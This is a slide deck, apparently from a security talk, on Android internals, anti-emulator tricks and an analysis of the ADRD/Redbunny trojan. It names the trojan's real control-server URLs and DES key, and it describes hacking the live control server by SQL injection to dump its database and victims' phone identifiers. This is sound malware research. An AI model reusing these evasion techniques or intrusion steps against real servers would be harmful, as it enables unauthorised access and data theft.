The document discusses the Android architecture and tools used for analyzing Android applications. It describes analyzing the Red Bunny (ADRD) malware sample in detail, including decrypting communications, analyzing database schemes and control servers, and examining updated application payloads. Dynamic analysis techniques are outlined for monitoring an emulator or device in real time.
4. 8:30 PM
DALVIK VM
- Register-based virtual machine
- It uses its own bytecode, not Java bytecode.
- Run on a slow CPU with little RAM.
- Run on an operating system without swap space.
- Optimized for memory efficiency.
- Dex class file format.
5. 8:30 PM
Dex file format
header
string_ids
type_ids
proto_ids
field_ids
method_ids
class_defs
data
8. 8:30 PM
Anti-analysis
Examples:
- Easy: Use a.class and A.class as class names: the file will
be hidden on case-insensitive file systems.
- Medium: Optimize/ofuscate the code with ProGuard.
- Hard: Modify bytecode to break reversing tools (be
sure that it still runs on Dalvik.)
if self.__value_type >= VALUE_SHORT
Ej: androguard-a1: ...
elif self.__value_type == VALUE_ARRAY :
...
elif self.__value_type == VALUE_BYTE :
Insert value type ...
VALUE_ANNOTATION elif self.__value_type == VALUE_NULL :
...
elif self.__value_type == VALUE_BOOLEAN :
...
else :
raise(“oops”)
11. 8:30 PM
Dynamic Analysis
Advance:
- Create you own system image and modify the java classes to log the
program flow. Example, framework/base/core/java/android/os/
Process.java
14. 8:30 PM
Anti-VM
- Detecting the emulator is very easy:
DEVICE_ID:
String id = Settings.Secure.getString(this.getContentResolver(), Settings.Secure.ANDROID_ID);
boolean emulator = TextUtils.isEmpty(id);
Solution:
Change secure->android_id on data/data/com.android.providers.settings/databases/settings.db
IMSI:
TelephonyManager manager = (TelephonyManager)getSystemService(TELEPHONY_SERVICE);
String imsi = manager.getSubscriberId(); (00000... on emulator)
Solution:
Patch the emulator binary (search for +CGSN string) or the emulator source code (external/
qemu/telephony/android_modem.c).
15. 8:30 PM
More Anti-VM
- LocationManager.NETWORK_PROVIDER -> IllegalArgumentException
- Detect ADB stuff.. process, network, debug enabled...
- /proc/cpuinfo - > Hardware
: Goldfish
- vibrator.vibrate(milliseconds) and use SensorListener (sensor data doesn’t
change)
(Thanks Ehooo)
- Qemu specific detection (Google)
Solution:
Patch emulator, Qemu, system hooking...
16. 8:30 PM
Alternatives to Android Emulator
- http://www.android-x86.org/ . Supports VMware
- Use a real phone... Slower
17. 8:30 PM
Attack Vectors
- Alternative markets, repacked applications.
-SMS, MMS vulnerabilities, Fuzzing!!!.
- Wireless, Bluetooth Drivers
- NFC
- System componentes: Webkit,
sound library, Kernel.
18. 8:30 PM
Third party software
Source: http://android.git.kernel.org/
19. 8:30 PM
ADRD aka Redbunny
- "Security Alert 2011-02-14: New Android Trojan 'ADRD' Was Found in
the Wild by Aegislab" ( http://blog.aegislab.com/index.php?
op=ViewArticle&articleId=75&blogId=1 ) !
Notification
- "[…] Today, we found a new Android trojan,
we call it "ADRD", which was not reported by any security vendors before.
[…]"
- Jaime Blasco and Pablo Rincón were working together,
analyzing this malware on Feb 2, 2011:
* Name: com.beautyfullivewallpaper
* Date: Feb. 2, 2011, 1:49 p.m.
- Also known as HongTouTou
21. 8:30 PM
Detection
- Sends http requests through a proxy:
* HttpHost localHttpHost = new HttpHost("10.0.0.172", 80, "http");
* HttpParams localHttpParams =
localDefaultHttpClient.getParams().setParameter("http.route.default-
proxy", localHttpHost);
- Services:
* com.xxx.yyy.MyService
* .beauty.Beauty
- Intents:
* android.intent.action.BOOT_COMPLETED **** -> Boots at system startup
* android.intent.action.PHONE_STATE
* android.net.conn.CONNECTIVITY_CHANGE
22. 8:30 PM
Analysis I
Service module (MyService): Sets a Proxy for GET/POST and
- Sets the preferred apn 1 HTTP specially crafted headers
- Runs each 12 hours (UA, MIME types)
- Looks for specific APN network : 2
“CMWAP” || “UNIWAP”
Cipher data module
Send data to adrd.taxuan.net/ public static String encrypt/decrypt
3
index.aspx?im=%s: Cipher localCipher = Cipher.getInstance("DES/CBC/PKCS5Padding");
+ IMEI
+ IMSI
Loop
+ Netway (preferred APN)
+ Decrypt response
+ iversion
+ Switch(cmd) It depends on the
+ oversion 4
+ 0 Do nothing
+ 1 adad.StartGo()
adad.StartGo() + 2 ParseO 5
Sends http://adrd.xiaxiab.com/pic.aspx?im= + 3 UpdateHelper()
+encrypt(IMEI+IMSI
Parses the big list of ulrs/referers
B#1#963a_w1|http://59.173.12.105/g/ UpdateHelper installs the update
g.ashx?w=963a_w1 apk 6
BBBB.Go() -> Retrieves search lists of
wap.baidu.com
FixUrls(): Send random requests adding
BAIDU_WISE_UID and HTTP_HEADERS. ParseO(): parse server response (number, flags, tags..):
Sends log data to control servers 6 T213607170863|12345|+ -10086+ abc -597| [ '
6
23. 8:30 PM
Analysis II
- Following the encryption routines, the DES key is found…: this.kk = "48734154";
* UpdateHelper class:
public class UpdateHelper
{
private static String savefilepath = "/myupdate.apk";
private Context ct;
private int netway;
* Benefit from visits to the content (Baidu) and bandwidth consumption (China Mobile &&
Unicom) and also SMS charges.
- Server URLs (there are more):
http://adrd.xiaxiab.com/pic.aspx?im=CIPHERED_DATA
http://adrd.taxuan.net/index.aspx?im=CIPHERED_DATA
- We want to know more!!
24. 8:30 PM
Control Servers
- adrd.xiaxiab.com from an eagle view:
* Microsoft-IIS/6.0
* Debug Enabled (Displaying .NET errors and backtraces)
* Hidden paths to the .Net/aspx application
* ALL is Chinese! (WTF!?!"·$%&/(?)
- Possible vector attacks:
* HTTP functions + DES key + pyDes = "legal" HTTP Requests (at least for the adrd server)
25. 8:30 PM
Control Servers
- First results:
Search
* Exceptions in chinese. Google Translate is your friend
* Errors at .NET (it didn't generate any html list/table, or view to use for data displaying)
* We got a successful Sql injection after the last ciphered parameter :D).
* User without admin privileges.
* Permissions to run Backups + Shared Resources = Timeout
* Other possibilities:
+ 1: Create a temporal db, with just one table each time, dump paginated rows and run
backups. Problem: Complex to do and complex to rebuild the original DB (Also the lang
didn't help)
+ 2: Try to get a shell in any possible way. Problem: time, exploits, noise (our current
attacks were hidden by DES at the http logs, and it's not usual to log all the db queries for
performance reason.
26. 8:30 PM
Database Information
- All the scheme obtained: list of Tables, Fields, types, stored procedures
- IMEI/IMSIs list (at least some of them), logs, keywords, Baidu accounts
- The main stored procedure affected by the sql injection retrieves the URL of myupdate.apk, that
points to adrd.xiaxiab.com/down.aspx !
* Parameters:
@imei varchar(50), @imsi varchar(50), @ip varchar(128), @logs varchar(256), @netwap int
* Store procedure:
--if (@netwap=2)
select 'T-1|T11'
--select 'T3http://adrd.xiaxiab.com/down.aspx'
--select 'T213607170863|12345|+ -10086+ abc -597| [ '
--else
--select 'T013607170863'
* Looks that they were considering the netwap (based on the mobile operator) as a criteria to send
commands
* TX (where X seems to be a command type)
* 13607170863 is a phone number located at Wuhan
28. 8:30 PM
Myupdate.apk
- It uses the main package of the ADRD family xxx.yyy.
- The update has other permissions: WRITE_SMS, READ_SMS,
RECEIVE_SMS, SEND_SMS..
- Looks like a google reader
- It adds a local sqlite DB (keyword storage).
go_g1_sms: id, keyword, type, flag
go_g2_sms: id, keyword, keyword2
- SMSObserver:
* Replaces keywords on SMS’s.
* Sends SMS!
31. 8:30 PM
Infections
g Infections by operator
+20K different IMSIs
Other affected operators:
Far EasT one
Peoples Telephone Company
Hutchison 3G
PCCW Mobile Sunday
Hong Kong Telecom
Smart One Mobile
32. 8:30 PM
Thank You
! Questions?
Ok Cancel
@jaimeblascob
@PabloForThePPL